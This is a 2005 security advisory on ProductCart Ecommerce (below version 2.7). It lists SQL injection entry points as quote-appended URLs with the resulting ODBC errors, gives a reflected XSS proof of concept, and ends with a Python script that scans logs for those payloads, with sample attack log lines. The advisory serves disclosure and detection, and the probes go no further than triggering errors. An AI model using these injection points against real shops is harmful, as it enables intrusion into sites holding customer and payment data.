Author: Dedi Dwianto
Date: June, 07th 2005
Location: Indonesia, Jakarta
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : ProductCart Ecommerce
Version     : < 2.7
URL         : http://www.earlyimpact.com/
Vendor      : Early Impact
Description:
ProductCart Ecommerce is popular ecommerce software. On some pages this
software filters SQL in query parameters via the included file msg.asp, but
I found a new bug where a user can input SQL queries.
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. SQL Injection
* http://victim/pc/viewPrd.asp?idcategory=[catid][SQL INJECTION]&idproduct=[prod id]
Example:
http://victim/pc/viewPrd.asp?idcategory=16'&idproduct=42
Error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in
query expression 'idcategory=16''.
/apparel/productcart/pc/include-metatags.asp, line 87
* http://victim/pc/pcadmin/editCategories.asp?nav=&lid=[id cat][SQL INJECTION]
Example:
http://victim/pc/pcadmin/editCategories.as...v=&lid=123'
Error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in
query expression 'idCategory=123' ORDER BY categoryDesc'.
/apparel/productcart/pcadmin/editCategories.asp, line 69
* http://victim/pc/pcadmin/modCustomCardPaym...?mode=Edit&idc=[page][SQL INJECTION]&id=[id]&gwCode=[code]
Example:
http://victim/pc/pcadmin/modCustomCardPaym...d=55&gwCode=101
Error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing
operator) in query expression
'(((customCardTypes.idcustomCardType)=1') AND
((payTypes.gwCode)=101'))'.
/apparel/productcart/pcadmin/modCustomCardPaymentOpt.asp, line 162
* http://victim/pc/pcadmin/OptionFieldsEdit.asp?idc=1&id=[id]&idccr=[id][SQL INJECTION]
Example:
http://victim/pc/pcadmin/OptionFieldsEdit....55&idccr=2'
Error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in
query expression 'idCustomCardRules=2';'.
/apparel/productcart/pcadmin/OptionFieldsEdit.asp, line
B. XSS
PoC:
http://victim/pc/pcadmin/techErr.asp?error=[XSS]
http://victim/pc/pcadmin/techErr.asp?error...</script>
C. Fix
Sorry, I can't give a solution because I can't view the source code, because
that's commercial software.
Contacted vendor: no response.
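Since no vendor fix was available, an added detection example (not from the advisory or from Early Impact): it scans IIS-style W3C log lines for requests to the endpoints listed above whose vulnerable id parameters carry anything but digits, or whose techErr.asp error parameter carries markup. The log column layout and the sample lines are constructed, and the /pc/ paths follow the advisory's sample URLs.

```python
import re
from urllib.parse import parse_qs
# Endpoint (lower-cased URI stem) -> parameters the advisory shows reaching a
# query or page unescaped; the "/pc/" prefix follows the advisory's sample URLs.
SINKS = {
    "/pc/viewprd.asp": {"idcategory"},
    "/pc/pcadmin/editcategories.asp": {"lid"},
    "/pc/pcadmin/modcustomcardpaymentopt.asp": {"idc"},
    "/pc/pcadmin/optionfieldsedit.asp": {"idccr"},
    "/pc/pcadmin/techerr.asp": {"error"},
}
# techErr.asp reflects 'error' into HTML: markup or a script URI is out of place there.
MARKUP_RE = re.compile(r"[<>]|javascript:", re.I)

def param_is_suspicious(name, value):
    """Every id parameter is numeric; only techErr's 'error' carries free text."""
    if name == "error":
        return MARKUP_RE.search(value) is not None
    return not value.isdigit()  # a quote, space or operator here ends up in the SQL

def scan_line(line):
    """Return (stem, param, decoded value) findings for one log line; [] if clean."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 7:
        return []  # header/comment line, or not the expected column layout
    stem, query = fields[4].lower(), fields[5]
    if stem not in SINKS or query == "-":
        return []
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() in SINKS[stem]:
            findings += [(stem, name, v) for v in values if param_is_suspicious(name.lower(), v)]
    return findings

def scan_log(text):
    return [hit for line in text.splitlines() for hit in scan_line(line)]

# Constructed sample log (not real traffic); columns assumed as in the #Fields line.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-06-07 10:00:01 192.0.2.10 GET /pc/viewPrd.asp idcategory=16&idproduct=42 200
2005-06-07 10:00:05 192.0.2.10 GET /pc/viewPrd.asp idcategory=16%27&idproduct=42 500
2005-06-07 10:01:12 192.0.2.11 GET /pc/pcadmin/editCategories.asp nav=&lid=123%27 500
2005-06-07 10:02:30 192.0.2.12 GET /pc/pcadmin/techErr.asp error=%3Cscript%3E%3C/script%3E 200
2005-06-07 10:03:00 192.0.2.13 GET /pc/pcadmin/techErr.asp error=Invalid+login 200
"""

if __name__ == "__main__":
    for stem, name, value in scan_log(SAMPLE_LOG):
        print(f"suspicious request to {stem}: {name}={value!r}")
```

Requests that trip this check and return a 500 are the ones most likely to have produced the ODBC '80040e14' error pages shown above, so correlating both signals cuts false positives.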